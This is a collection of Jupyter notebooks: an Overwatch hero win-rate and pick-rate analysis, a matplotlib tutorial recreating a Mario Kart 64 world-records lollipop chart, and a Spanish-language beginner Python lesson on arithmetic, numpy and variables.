Index_Levels = df2[0:5]
df3 = df1.index.get_level_values(0)
Index_Role = df3[::8]
print(Index_Role)
# 5. Gather Win_Rates by Role for Bronze, Gold & GrandMaster levels #
Bronze_Win_Rates = df1[1::8]
Gold_Win_Rates = df1[3::8]
Grandmaster_Win_Rates = df1[4::8]
Bin = [1,2,3,4]
# 6. set width of bar #
barWidth = 0.25
# 7. set height of bar #
bars1 = Bronze_Win_Rates[Bronze_Win_Rates.columns[0]].tolist()
bars2 = Gold_Win_Rates[Gold_Win_Rates.columns[0]].tolist()
bars3 = Grandmaster_Win_Rates[Grandmaster_Win_Rates.columns[0]].tolist()
# 8. Set position of bar on X axis #
r1 = np.arange(len(bars1))
r2 = [x + barWidth for x in r1]
r3 = [x + barWidth for x in r2]
# 9. Make the plot #
plt.bar(r1, bars1, color='#e67e22', width=barWidth, edgecolor='white', label='Bronze')
plt.bar(r2, bars2, color='#f1c40f', width=barWidth, edgecolor='white', label='Gold')
plt.bar(r3, bars3, color='#c0392b', width=barWidth, edgecolor='white', label='GrandMaster')
plt.ylim(40,61)
# 10. Add xticks on the middle of the group bars #
plt.xlabel('Role', fontweight='bold')
plt.ylabel('Win Rates', fontweight='bold')
plt.xticks([r + barWidth for r in range(len(bars1))], Index_Role)
# 11. Create legend & Show graphic #
plt.legend()
plt.show()
###Output
Index(['DEFENSE', 'OFFENSE', 'SUPPORT', 'TANK'], dtype='object', name='Role')
###Markdown
To conclude the n°1 We can see quite easily on the graph that the victory rates of bronze level players are unequal depending on the class chosen. On the other hand, this gap tends to narrow as the level increases until it becomes almost identical for all hero classes at the GrandMaster level. This analysis can allow us to advise beginner players to focus on the "support" class in order to significantly increase their chances of winning a game. 2. Scatter plots of the pick rate of each hero & the win rate The idea here is to represent in a graph both the pick rate (if a players are picking the Hero "x" 1 time on 100 the pick rate is 1%) for each hero and his victory rate. The whole is divided into classes (bubble colors). This graph is made for the Bronze level as well as for the GrandMaster level. We are looking here to visualize graphically whether players choose their heroes according to the victory rate they offer or whether it is the types of classes that influence players' choices.
###Code
# 1. Import lib & dataset - see point n°1 #
# 2. Select Only Bronze #
is_Bronze = dataset['Rank']=='Bronze'
df_Bronze = dataset[is_Bronze]
# 3. select Only PSN #
is_PSN = df_Bronze['Platform']=='PSN'
df_Bronze_PSN = df_Bronze[is_PSN]
# 4. Calculate Mean of rates for Bronze on PSN #
df_Bronze_PSN.mean(axis = 0)
# 5. Keep only columns : Hero, Pick_Rate, Win_Rate, Role #
df_Bronze_PSN_Clean = df_Bronze_PSN.drop(["Tie_Rate", "On_fire", "Platform", "Rank", "Date"], axis=1)
# 6. Convert df to values then lists #
PR = df_Bronze_PSN_Clean_Pick_rate = df_Bronze_PSN_Clean[['Pick_rate']].values.tolist() #x
WR = df_Bronze_PSN_Clean_Win_Rate = df_Bronze_PSN_Clean[['Win_rate']].values.tolist()#y
WR2 = WR
ROLE = df_Bronze_PSN_Clean_Win_Rate = df_Bronze_PSN_Clean[['Role']].values.tolist() #z
Color_role = df_Bronze_PSN_Clean_Win_Rate = df_Bronze_PSN_Clean[['Role']]
###Output
_____no_output_____
###Markdown
I want the win rate to be visually constatable also with the buble size. To do that i need to enchance the difference of the minimum win rate and the maximum one. But i need to keep it proportional
###Code
# 7. Create value for bubbles size #
WR3 = df_Bronze_PSN_Clean_Win_Rate = df_Bronze_PSN_Clean[['Win_rate']].values
WR4 = WR3-30
WR5 = WR4*70
WRZ = WR5.tolist()
# 8. Plot the Data #
x = PR
y = WR
z = [WRZ]
colors = {'TANK':'red', 'SUPPORT':'blue', 'DEFENSE':'green', 'OFFENSE':'black'} # Change color with c and alpha. I map the color to the X axis value
plt.scatter(x, y,s=z, c=Color_role['Role'].apply(lambda x: colors[x]), edgecolors="white",alpha=0.6, linewidth=2)
plt.xlabel("Pick Rate in %") # Add titles (main and on axis)
plt.ylabel("Win Rate in %")
plt.title("Distribution of the 23 Heros according to the pick rate and the win rate \n For bronze level")
black_patch = mpatches.Patch(color='black' , label='TANK')
green_patch = mpatches.Patch(color='green', label='SUPPORT')
blue_patch = mpatches.Patch(color='blue' , label='DEFENSE')
red_patch = mpatches.Patch(color='red' , label='OFFENSE')
plt.legend(handles=[red_patch,black_patch,green_patch, blue_patch])
plt.show()
###Output
_____no_output_____
###Markdown
Let's do the same plot for the level of GrandMaster
###Code
# 8. Select the needed data #
is_Grandmaster = dataset['Rank']=='Grandmaster' #We focus only on the rank Grand Master
df_Grandmaster = dataset[is_Grandmaster]
df_Grandmaster
is_PSNGM = df_Grandmaster['Platform']=='PSN' #We focus only on the platform PSN
df_Grandmaster_PSN = df_Grandmaster[is_PSNGM]
df_Grandmaster_PSN
# 9. Calculate Mean of rates for Bronze on PSN #
df_Grandmaster_PSN.mean(axis = 0)
df_Grandmaster_PSN_Clean = df_Grandmaster_PSN.drop(["Tie_Rate", "On_fire", "Platform", "Rank", "Date"], axis=1)#Keep only columns : Hero, Pick_Rate, Win_Rate, Role
# 10. Convert df to values then lists #
PRGM = df_Grandmaster_PSN_Clean_Pick_rate = df_Grandmaster_PSN_Clean[['Pick_rate']].values.tolist() #x
WRGM = df_Grandmaster_PSN_Clean_Win_Rate = df_Grandmaster_PSN_Clean[['Win_rate']].values.tolist() #y
WR2GM = WR
ROLEGM = df_Grandmaster_PSN_Clean_Win_Rate = df_Grandmaster_PSN_Clean[['Role']].values.tolist() #z
ROLE = {'TANK', 'SUPPORT', 'DEFENSE', 'OFFENSE'}
Color_roleGM = df_Grandmaster_PSN_Clean_Win_Rate = df_Grandmaster_PSN_Clean[['Role']]
###Output
_____no_output_____
###Markdown
I want the win rate to be visually constatable also with the buble size. To do that i need to enchance the difference of the minimum win rate and the maximum one. But i need to keep it proportional.
###Code
# 11. Create value for bubbles sizeand Define the variables#
WR3GM = df_Grandmaster_PSN_Clean_Win_Rate = df_Grandmaster_PSN_Clean[['Win_rate']].values
WR4GM = WR3GM-30
WR5GM = WR4GM*70
WRZGM = WR5GM.tolist()
xgm = PRGM
ygm = WRGM
zgm = [WRZGM]
# 12. Plot the data #
colors = {'TANK':'black', 'SUPPORT':'green', 'DEFENSE':'blue', 'OFFENSE':'red'} #Change color with c and alpha. I map the color to the X axis value.
plt.scatter(xgm, ygm,s=zgm, c=Color_role['Role'].apply(lambda x: colors[x]), edgecolors="white", alpha=0.5, linewidth=1)
plt.xlabel("Pick Rate in %") #Add titles on axis
plt.ylabel("Win Rate in %")
plt.title("Distribution of the 23 Heros according to the pick rate and the win rate \n For GrandMaster level") #Add the general title
black_patch = mpatches.Patch(color='black' , label='TANK')
green_patch = mpatches.Patch(color='green', label='SUPPORT')
blue_patch = mpatches.Patch(color='blue' , label='DEFENSE')
red_patch = mpatches.Patch(color='red' , label='OFFENSE')
plt.legend(handles=[red_patch,black_patch,green_patch, blue_patch])
plt.show()
###Output
_____no_output_____
###Markdown
To conclude the n°2 We can see at first sight that heros pick rate and win rate is much more dispersed than for the grandmaster level. On the other hand, it is not obvious here that the characters' choices are influenced by the victory rate. It is also not easy to show the heroes' choices according to class, neither for the bronze level nor for the grandmaster level. Evolution of the "on fire rate" level after level In our dataset, being on fire is a state triggered in the game after a number of remarkable actions (e. g. a sequence of several kills). The rate of "on_fire" corresponds to the number of times players have been able to trigger this state in relation to the number of games.Here we study the evolution of the triggering of this state "in fire" over the evolution of levels for each character in the "tank" and "support" class. We therefore try to see graphically if the evolutions are rhythmic in the same way for each character and for each class studied.
###Code
# 1. Import lib & dataset - see point n°1 #
# 2. Create list of unique values for Role & Platform #
Role_list = list(set(dataset["Role"]))
Order_rank = ["Bronze","Silver" , "Gold", "Platinum","Diamond","Master","Grandmaster" ]
# 3. Select Only Tie rate and level #
df1 = dataset.drop(["Tie_Rate","Pick_rate", "Role", "Win_rate", "Date", "Date"], axis=1)
df2 = df1.pivot_table(index=["Hero"], columns="Rank")
# 4. OrderClass and round vlaues #
df3 = df2.reindex(Order_rank, axis=1, level=1)
# 5. Create Axis #
x = [1,2,3,4,5,6,7]
df_temp_Tank = dataset[dataset["Role"]=="TANK"] #Get the list of tank
df_temp2_Tank = df_temp_Tank.pivot_table(index=["Hero"], columns="Win_rate")
df_temp3_Tank = list(df_temp2_Tank.index)
df_temp3_Tank
# 6. Plot data for each tank #
df7 = df3.loc[df3.index.isin(df_temp3_Tank)].values
xx = (1,2,3,4,5,6,7)
for i in df7 : plt.plot(xx, i, alpha=0.8)
list7=[] #Add value at end of each line
for gg in df7 : list7.append((gg[6:7]))
for valuess in list7 : plt.text(7+0.5, valuess, np.around(valuess,1))
list8=[] #Add value at beginning of each line
for ggg in df7 : list8.append((ggg[0:1]))
for valuess in list8 : plt.text(0.17, valuess, np.around(valuess,1), )
plt.xlabel("Rank")
plt.ylabel("On Fire Rate")
plt.title("Heros that are Tank")
plt.xticks([1,2,3,4,5,6,7], Order_rank, fontsize='8')
plt.legend(df3.loc[df3.index.isin(df_temp3_Tank)].index)
plt.show()
# 7. Plot the data for each support #
x = [1,2,3,4,5,6,7]
df_temp_SUPPORT = dataset[dataset["Role"]=="SUPPORT"]
df_temp2_SUPPORT = df_temp_SUPPORT.pivot_table(index=["Hero"], columns="Win_rate")
df_temp3_SUPPORT = list(df_temp2_SUPPORT.index)
df7_SUPPORT = df3.loc[df3.index.isin(df_temp3_SUPPORT)].values
xx = (1,2,3,4,5,6,7)
for i in df7_SUPPORT : plt.plot(xx, i, alpha=0.8)
list7_SUPPORT=[]
for gg in df7_SUPPORT : list7_SUPPORT.append((gg[6:7]))
for valuess in list7_SUPPORT : plt.text(7+0.5, valuess, np.around(valuess,1))
list8_SUPPORT=[]
for ggg in df7_SUPPORT : list8_SUPPORT.append((ggg[0:1]))
for valuess in list8_SUPPORT : plt.text(0.17, valuess, np.around(valuess,1), )
plt.xlabel("Rank")
plt.ylabel("On Fire Rate")
plt.title("Heros that are Support")
plt.legend(df3.loc[df3.index.isin(df_temp3_SUPPORT)].index)
plt.xticks([1,2,3,4,5,6,7], Order_rank, fontsize='8')
plt.show()
###Output
_____no_output_____ |
src/notebooks/web-lollipop-plot-with-python-mario-kart-64-world-records.ipynb | ###Markdown
AboutThis page showcases the work of [Cedric Scherer](https://www.cedricscherer.com), built for the [TidyTuesday](https://github.com/rfordatascience/tidytuesday) initiative. You can find the original code on his github repository [here](https://github.com/z3tt/TidyTuesday/blob/master/R/2021_22_MarioKart.Rmd), written in [R](https://www.r-graph-gallery.com).Thanks to him for accepting sharing his work here! Thanks also to [Tomás Capretto](https://tcapretto.netlify.app) who translated this work from R to Python! 🙏🙏 Load libraries As always, several libraries are needed in order to build the chart. `numpy`, `pandas` and `matplotlib` are pretty usual, but we also need some lesser known libraries like `palettable` to get some nice colors.
###Code
import numpy as np
import pandas as pd
import matplotlib.colors as mc
import matplotlib.pyplot as plt
from matplotlib.cm import ScalarMappable
from matplotlib.lines import Line2D
from mpl_toolkits.axes_grid1.inset_locator import inset_axes
from palettable import cartocolors
###Output
_____no_output_____
###Markdown
Load the dataset Today we are going to visualize world records for the Mario Kart 64 game. The game consists of 16 individual tracks and world records can be achieved for the fastest *single lap* or the fastest completed race (**three laps**). Also, through the years, players discovered **shortcuts** in many of the tracks. Fortunately, shortcut and non-shortcut world records are listed separately.Our chart consists of a double-dumbbell plot where we visualize world record times on Mario Kart 64 with and without shortcuts. The original source of the data is [https://mkwrs.com/](https://mkwrs.com/), which holds time trial world records for all of the Mario Kart games, but we are using the version released for the [TidyTuesday](https://github.com/rfordatascience/tidytuesday) initiative on the week of 2021-05-25. You can find the original announcement and more information about the data [here](https://github.com/rfordatascience/tidytuesday/tree/master/data/2021/2021-05-25).
###Code
df_records = pd.read_csv('https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2021/2021-05-25/records.csv')
df_records.head(3)
###Output
_____no_output_____
###Markdown
From all the columns in the data, we will only use `track`, `type`, `shortcut`, `date`, and `time`. - `track` indicates the name of the track- `type` tells us whether the record is for single lap or a complete race- `shortcut` is a yes/no variable that identifies records where a shortcut was used- `date` represents the date where the record was achieved- `time` indicates how many seconds it took to complete the track Prepare the dataset Today's visualization is based on records for complete races only. Our first step is to create a `pandas.DataFrame` called `df_rank` that keeps current world records for every track.<!-- Do you prefer this approach instead?df_rank = df_records.query("type == 'Three Lap'")df_rank = ( df_rank.loc[df_rank.groupby("track")["time"].idxmin()] .sort_values("time", ascending=False) .assign(track = lambda df: pd.Categorical(df['track'], ordered=True, categories=df["track"]))) -->
###Code
# Keep records where type is Three Lap
df_rank = df_records.query("type == 'Three Lap'")
# Keep records with the minimum time for each track
df_rank = df_rank.loc[df_rank.groupby("track")["time"].idxmin()]
# Sort by descending time
df_rank = df_rank.sort_values("time", ascending=False)
# Make "track" ordered categorical with order given by descending times
# This categorical type will be used to sort the tracks in the plot.
df_rank["track"] = pd.Categorical(df_rank["track"], ordered=True, categories=df_rank["track"])
###Output
_____no_output_____
###Markdown
Then we have `df_records_three` which holds all the records, no matter they were beaten or not. It is used to derive other data frames that used in our chart.
###Code
# We call '.reset_index()' to avoid SettingWithCopyWarning
df_records_three = df_records.query("type == 'Three Lap'").reset_index()
df_records_three["year"] = pd.DatetimeIndex(df_records_three["date"]).year
###Output
_____no_output_____
###Markdown
`df_connect` is the first data frame we derive. This one is used to add a dotted line that connects record times with and without shortcuts and will serve as a reference for their difference.
###Code
# First of all, for each track and shortcut, obtain the minimum and maximum
# value of time. These represent the most recent and first records, respectively.
df_connect = df_records_three.groupby(["track", "shortcut"]).agg(
no = ("time", min),
yes = ("time", max)
).reset_index()
# Next, put it into long format.
# Each row indicates the track, whether shortcuts were used,
# if it's the current record, and the time achieved.
df_connect = pd.melt(
df_connect,
id_vars=["track", "shortcut"],
value_vars=["no", "yes"],
var_name="record",
value_name="time"
)
# The dotted line goes from the first record without shortcut (the slowest)
# to the most recent record with shortcut (the fastest)
df_connect = df_connect.query(
"(shortcut == 'No' and record == 'no') or (shortcut == 'Yes' and record == 'yes')"
)
# Finally it is put in wide format, where there's only one row per track.
df_connect = df_connect.pivot_table(index="track", columns="record", values="time").reset_index()
###Output
_____no_output_____
###Markdown
We also have `df_longdist` and `df_shortcut`. Note each data frame consists of five columns: `track`, `year`, `max`, `min`, and `diff`. `year` refers to the year where the current record was achieved, `max` is the completetion time for the first record and `min` is the time for the current record. `diff` is simply the difference between `max` and `min`, i.e. a measurement of how much the first record was improved. `df_shortcut` and `df_longdist` refer to records with and without shortcuts, respectively.
###Code
# Long dist refers to records without shortcut
df_longdist = df_records_three.query("shortcut == 'No'")
# Only keep observations referring to either the first or the most recent record, by track.
grouped = df_longdist.groupby("track")
df_longdist = df_longdist.loc[pd.concat([grouped["time"].idxmax(), grouped["time"].idxmin()])]
# Create a 'group' variable that indicates whether the record
# refers to the first record, the one with maximum time,
# or to the most recent record, the one with minimum time.
df_longdist.loc[grouped["time"].idxmax(), "group"] = "max"
df_longdist.loc[grouped["time"].idxmin(), "group"] = "min"
# 'year' records the year of the most recent record
df_longdist["year"] = df_longdist.groupby("track")['year'].transform(max)
# Put the data in wide format, i.e., one observation per track.
df_longdist = df_longdist.pivot_table(index=["track", "year"], columns="group", values="time").reset_index()
df_longdist["diff"] = df_longdist["max"] - df_longdist["min"]
# Same process than above, but using records where shortcut is "Yes"
df_shortcut = df_records_three.query("shortcut == 'Yes'")
grouped = df_shortcut.groupby("track")
df_shortcut = df_shortcut.loc[pd.concat([grouped["time"].idxmax(), grouped["time"].idxmin()])]
df_shortcut.loc[grouped["time"].idxmax(), "group"] = "max"
df_shortcut.loc[grouped["time"].idxmin(), "group"] = "min"
df_shortcut["year"] = df_shortcut.groupby("track")['year'].transform(max)
df_shortcut = df_shortcut.pivot_table(index=["track", "year"], columns="group", values="time").reset_index()
df_shortcut["diff"] = df_shortcut["max"] - df_shortcut["min"]
###Output
_____no_output_____
###Markdown
All the datasets are sorted according to the order of `"track"` in `df_rank`. To do so, we first set the type of the `"track"` variable equal to the categorical type in `df_rank`, and then sort according to its levels.
###Code
tracks_sorted = df_rank["track"].dtype.categories.tolist()
# Sort df_connect
df_connect["track"] = df_connect["track"].astype("category")
df_connect["track"].cat.set_categories(tracks_sorted, inplace=True)
df_connect = df_connect.sort_values("track")
# Sort df_longdist
df_longdist["track"] = df_longdist["track"].astype("category")
df_longdist["track"].cat.set_categories(tracks_sorted, inplace=True)
df_longdist = df_longdist.sort_values("track")
# Sort df_shortcut
df_shortcut["track"] = df_shortcut["track"].astype("category")
df_shortcut["track"].cat.set_categories(tracks_sorted, inplace=True)
df_shortcut = df_shortcut.sort_values("track")
###Output
_____no_output_____
###Markdown
Start building the chart This highly customized plot demands a lot of code. It is a good practice to define the colors at the very beginning so we can refer to them by name.
###Code
GREY94 = "#f0f0f0"
GREY75 = "#bfbfbf"
GREY65 = "#a6a6a6"
GREY55 = "#8c8c8c"
GREY50 = "#7f7f7f"
GREY40 = "#666666"
LIGHT_BLUE = "#b4d1d2"
DARK_BLUE = "#242c3c"
BLUE = "#4a5a7b"
WHITE = "#FFFCFC" # technically not pure white
###Output
_____no_output_____
###Markdown
Today we make use of the `palettable` library to make use of the `RedOr` palette, which is the one used in the original plot. We will also make use of the `matplotlib.colors.Normalize` class to normalize values into the (0, 1) interval before we pass it to our `colormap` function and `matplotlib.colors.LinearSegmentedColormap` to create a custom colormap for blue colors.
###Code
# We have two colormaps, one for orange and other for blue
colormap_orange = cartocolors.sequential.RedOr_5.mpl_colormap
# And we also create a new colormap using
colormap_blue = mc.LinearSegmentedColormap.from_list("blue", [LIGHT_BLUE, DARK_BLUE], N=256)
###Output
_____no_output_____
###Markdown
`colormap_orange and` and `colormap_blue` are functions now.
###Code
fig, ax = plt.subplots(figsize = (15, 10))
# Add segments ---------------------------------------------------
# Dotted line connection shortcut yes/no
ax.hlines(y="track", xmin="yes", xmax="no", color=GREY75, ls=":", data=df_connect)
# Segment when shortcut==yes
# First time we use the colormap and the normalization
norm_diff = mc.Normalize(vmin=0, vmax=250)
color = colormap_orange(norm_diff(df_shortcut["diff"].values))
ax.hlines(y="track", xmin="min", xmax="max", color=color, lw=5, data=df_shortcut)
# Segment when shortcut==no. Note we are overlapping lineranges
# We use the same normalization scale.
color = colormap_orange(norm_diff(df_longdist["diff"].values))
ax.hlines(y="track", xmin="min", xmax="max", color=color, lw=4, data=df_longdist)
ax.hlines(y="track", xmin="min", xmax="max", color=WHITE, lw=2, data=df_longdist)
# Add dots -------------------------------------------------------
## Dots when shortcut==yes – first record
# zorder is added to ensure dots are on top
ax.scatter(x="max", y="track", s=200, color=GREY65, edgecolors=GREY65, lw=2.5, zorder=2, data=df_shortcut)
## Dots when shortcut==yes – latest record
# This time we normalize using the range of years in the data, and use blue colormap
norm_year = mc.Normalize(df_shortcut["year"].min(), df_shortcut["year"].max())
color = colormap_blue(norm_year(df_shortcut["year"].values))
ax.scatter(x="min", y="track", s=160, color=color, edgecolors=color, lw=2, zorder=2, data=df_shortcut)
## Dots shortcut==no – first record
color = colormap_blue(norm_year(df_longdist["year"].values))
ax.scatter(x="min", y="track", s=120, color=WHITE, edgecolors=color, lw=2, zorder=2, data=df_longdist)
## Dots shortcut==no – latest record
ax.scatter(x="max", y="track", s=120, color=WHITE, edgecolors=GREY65, lw=2, zorder=2, data=df_longdist)
# Add labels on the left side of the lollipops -------------------
# Annotations for tracks in df_shortcut
for row in range(df_shortcut.shape[0]):
ax.text(
df_shortcut["min"][row] - 7,
df_shortcut["track"][row],
df_shortcut["track"][row],
ha="right",
va="center",
size=16,
color="black",
fontname="Atlantis"
)
# Annotations for df_longdist, not in df_shortcut
for row in range(df_longdist.shape[0]):
if df_longdist["track"][row] not in df_shortcut["track"].values:
ax.text(
df_longdist["min"][row] - 7,
df_longdist["track"][row],
df_longdist["track"][row],
ha="right",
va="center",
size=17,
color="black",
fontname="Atlantis",
)
# Add labels on top of the first row of lollipops ----------------
# These labels are used to give information about the meaning of
# the different dots without having to use a legend.
# Label dots when shortcut==yes
df_shortcut_wario = df_shortcut.query("track == 'Wario Stadium'")
ax.text(
df_shortcut_wario["min"],
df_shortcut_wario["track"],
"Most recent record\nwith shortcuts\n",
color=BLUE,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
ax.text(
df_shortcut_wario["max"],
df_shortcut_wario["track"],
"First record\nwith shortcuts\n",
color=GREY50,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
# Label dots when shortcut==no
df_longdist_wario = df_longdist.query("track == 'Wario Stadium'")
ax.text(
df_longdist_wario["min"] - 10,
df_longdist_wario["track"],
"Most recent record\nw/o shortcuts\n",
color=BLUE,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
ax.text(
df_longdist_wario["max"] + 10,
df_longdist_wario["track"],
"First record\nw/o shortcuts\n",
color=GREY50,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
# Customize the layout -------------------------------------------
# Hide spines
ax.spines["left"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_visible(False)
# Hide y labels
ax.yaxis.set_visible(False)
# Customize x ticks
# * Remove x axis ticks
# * Put labels on both bottom and and top
# * Customize the tick labels. Only the first has the "seconds" appended.
ax.tick_params(axis="x", bottom=True, top=True, labelbottom=True, labeltop=True, length=0)
xticks = np.linspace(0, 400, num=9, dtype=int).tolist()
ax.set_xlim(-60, 400)
ax.set_xticks(xticks)
ax.set_xticklabels(["0 seconds"] + xticks[1:], fontname="Hydrophilia Iced", color=GREY40, size=9)
# Set background color for the subplot.
ax.set_facecolor(WHITE)
# Add thin vertical lines to serve as guide
# 'zorder=0' is imoprtant to they stay behind other elements in the plot.
for xtick in xticks:
ax.axvline(xtick, color=GREY94, zorder=0)
# Add vertical space to the vertical limit in the plot
x0, x1, y0, y1 = plt.axis()
plt.axis((x0, x1, y0, y1 + 0.5));
# Add custom legends ---------------------------------------------
# Legend for time difference.
# Recall the 'norm_diff()' created above.
# Create an inset axes with a given width and height.
cbaxes = inset_axes(
ax, width="0.8%", height="44%", loc=3,
bbox_to_anchor=(0.025, 0., 1, 1),
bbox_transform=ax.transAxes
)
cb = fig.colorbar(
ScalarMappable(norm=norm_diff, cmap=colormap_orange), cax=cbaxes,
ticks=[0, 50, 100, 150, 200, 250]
)
# Remove the outline of the colorbar
cb.outline.set_visible(False)
# Set label, playing with labelpad to put it in the right place
cb.set_label(
"Time difference between first and most recent record",
labelpad=-45,
color=GREY40,
size=10,
fontname="Overpass"
)
# Remove ticks in the colorbar with 'size=0'
cb.ax.yaxis.set_tick_params(
color=GREY40,
size=0
)
# Add ticklabels at given positions, with custom font and color
cb.ax.yaxis.set_ticklabels(
[0, 50, 100, 150, 200, 250],
fontname="Hydrophilia Iced",
color=GREY40,
size=10
)
# Legend for year
# We create a custom function to put the Line2D elements into a list
# that then goes into the 'handle' argument of the 'ax.legend()'
years = [2016, 2017, 2018, 2019, 2020, 2021]
def legend_dot(year):
line = Line2D(
[0],
[0],
marker="o",
markersize=10,
linestyle="none",
color=colormap_blue(norm_year(year)),
label=f"{year}"
)
return line
# Store the legend in a name because we use it to modify its elements
years_legend = ax.legend(
title="Year of Record",
handles=[legend_dot(year) for year in years],
loc=3, # lower left
bbox_to_anchor=(0.08, 0, 1, 1),
frameon=False
)
# Set font family, color and size to the elements in the legend
for text in years_legend.get_texts():
text.set_fontfamily("Hydrophilia Iced")
text.set_color(GREY40)
text.set_fontsize(10)
# Same modifications, but applied to the title.
legend_title = years_legend.get_title()
legend_title.set_fontname("Overpass")
legend_title.set_color(GREY40)
legend_title.set_fontsize(10)
# The suptitle acts as the main title.
# Play with 'x' and 'y' to get them in the place you want.
plt.suptitle(
"Let's-a-Go! You May Still Have Chances to Grab a New World Record for Mario Kart 64",
fontsize=13,
fontname="Atlantis Headline",
weight="bold",
x = 0.457,
y = 0.99
)
subtitle = [
"Most world records for Mario Kart 64 were achieved pretty recently (13 in 2020, 10 in 2021). On several tracks, the players considerably improved the time needed to complete three laps when they used shortcuts (Choco Mountain,",
"D.K.'s Jungle Parkway, Frappe Snowland, Luigi Raceway, Rainbow Road, Royal Raceway, Toad's Turnpike, Wario Stadium, and Yoshi Valley). Actually, for three out of these tracks the previous records were more than halved since 2020",
"(Luigi Raceway, Rainbow Road, and Toad's Turnpike). Four other tracks still have no records for races with shortcuts (Moo Moo Farm, Koopa Troopa Beach, Banshee Boardwalk, and Bowser's Castle). Are there none or did nobody find",
"them yet? Pretty unrealistic given the fact that since more than 24 years the game is played all around the world—but maybe you're able to find one and obtain a new world record?"
]
# And the axis title acts as a subtitle.
ax.set_title(
"\n".join(subtitle),
loc="center",
ha="center",
ma="left",
color=GREY40,
fontname="Overpass",
fontsize=9,
pad=20
)
# Add legend
fig.text(
0.8, .05, "Visualization: Cédric Scherer • Data: mkwrs.com/mk64",
fontname="Overpass",
fontsize=12,
color=GREY55,
ha="center"
)
# Set figure's background color, to match subplot background color.
fig.patch.set_facecolor(WHITE)
# Finally, save the plot!
plt.savefig(
"mario-kart-64-world-records.png",
facecolor=WHITE,
dpi=300,
bbox_inches="tight",
pad_inches=0.3
)
###Output
_____no_output_____ |
Dia_1/Dia_1_grupo1/.ipynb_checkpoints/Dia_1-_Paula-checkpoint.ipynb | ###Markdown
Ipython NotebookFernando Perez, el Colombiano que creo Ipython una de las interfaces Python mas importantes en el mundo en los ultimos 10 años.https://en.wikipedia.org/wiki/Fernando_P%C3%A9rez_(software_developer)https://pybonacci.es/2013/05/16/entrevista-a-fernando-perez-creador-de-ipython/http://fperez.org/personal.html Ejemplo de lo que puedes lograrhttp://nbviewer.jupyter.org/github/glue-viz/example_data_viewers/blob/master/mario/mario.ipynb Opreaciones Matematicas **Suma** : $2+3$
###Code
23
###Output
_____no_output_____
###Markdown
**Multiplicación**: $2x3$
###Code
2*34
###Output
_____no_output_____
###Markdown
**División**: $\frac{2}{3}$
###Code
2/
###Output
_____no_output_____
###Markdown
**Potencia**: $ 2^{3}$
###Code
2**3
###Output
_____no_output_____
###Markdown
Funciones TrigonometricasEn las siguientes celdas vamos a calcular los valores de funciones comunes en nuestras clases de matemáticas.Para esto, necesitamos importar la libreria numpy.
###Code
# Importar una libreria en Python
import numpy as np # el comando "as nb" sirve para asignarle un codigo mas corto a la libreria y ser mas rapido.
np.sin(3)
(np.sin(3))*(np.sin(2))
###Output
_____no_output_____
###Markdown
Logaritmo y Exponencial: $ln(3), e^{3}$
###Code
np.log(3)
np.exp(3)
###Output
_____no_output_____
###Markdown
Reto de Programación- Resolver la ecuación $$x^2 - x - 12 = 0$$- Encuentre la hipotenusa y los ángulos del triángulo rectangulo de lados a = 4 y b = 5 Variables Una variable es un espacio para guardar valores modificables o constantes.----```pythonnombre_de_la_variable = valor_de_la_variable```---**Los distintos tipos de variables son:****Enteros (**`int`**): 1, 2, 3, -10, -103**** Números continuos (**`float`**): 0.666, -10.678**** Cadena de texto (**`str`**): 'clubes', 'clubes de ciencia', 'Roberto'****Booleano (verdadero / Falso): `True`, `False` **
###Code
# Ejemplo
a = 5
print (a) # Imprimir mi variable
###Output
5
###Markdown
Variable tipo `int`
###Code
b = -15
print (b)
###Output
-15
###Markdown
Variable tipo `float`
###Code
c = 3.1416
print (c)
###Output
3.1416
###Markdown
Variable tipo `str`
###Code
d = 'clubes de ciencia'
print (d)
###Output
clubes de ciencia
###Markdown
Variable tipo `bool`
###Code
e = False
print (e)
###Output
False
###Markdown
Como averiguo el tipo de una variable ??Utilizando la función `type`:```pythontype(nombre_de_la_variable)```
###Code
print (type(a))
print (type(b))
print (type(c))
print (type(d))
print (type(e))
###Output
<class 'int'>
<class 'int'>
<class 'float'>
<class 'str'>
<class 'bool'>
###Markdown
Reto de Programación Variables para guardar colecciones de datos>** Python tiene otro 3 tipos de variables mas complejas que pueden almacenar colecciones de datos>como los visotos anteriormente**- Listas- Tuplas- Diccionarios ListasLas listas permiten guardar colecciones de datos con diferentes tipos:```pythonint; str; float; bool```Una lista se crea de la siguiente forma:```pythonnombre_de_la_lista = [valor_1, valor_2, valor_3]```Los valores de la lista pueden ser modificados.
###Code
# Ejemplo
mi_lista = [1,2,3,5,6,-3.1416]
mi_lista_diversa = [1,2,'clubes', 'de', 'ciencia', 3.1416, False]
print (mi_lista)
print (mi_lista_diversa)
###Output
[1, 2, 3, 5, 6, -3.1416]
[1, 2, 'clubes', 'de', 'ciencia', 3.1416, False]
###Markdown
Como puedo mirar un elemento o elementos de mi lista??Para leer el elemento de la posición `n`, se usa:```pythonmi_lista[n]```
###Code
# Ejemplo
print (mi_lista[0]) # Leer el primer elemento que se encuentra en la posición n=0
print (mi_lista_diversa[0])
print (type(mi_lista[5])) # Leer el tipo de variable en la posición n=5
###Output
1
1
<class 'float'>
###Markdown
** Como leer los elementos entre la posición n y m??**```pythonmi_lista[n:m+1]```
###Code
#Ejemplo
print (mi_lista[0:3]) # Leer entre n=0 y m=2
###Output
[1, 2, 3]
###Markdown
Reto de Programación TuplasLas tuplas permiten guardar colecciones de datos de diferentes tipos:```pythonint; str; float; bool```Una tupla se crea de la siguiente forma:```pythonmi_tupla = ('cadena de texto', 15, 2.8, 'otro dato', 25)```Los valores de una tupla no pueden ser modificados. Sus elementos se leen como en las listas
###Code
#Ejemplo
mi_lista = ('cadena de texto', 15, 2.8, 'otro dato', 25)
print (mi_lista)
print (mi_lista[2]) # leer el tercer elemento de la tupla
print (mi_lista[2:4]) # leer los dos ultimos elementos de la tupla
###Output
('cadena de texto', 15, 2.8, 'otro dato', 25)
2.8
(2.8, 'otro dato')
###Markdown
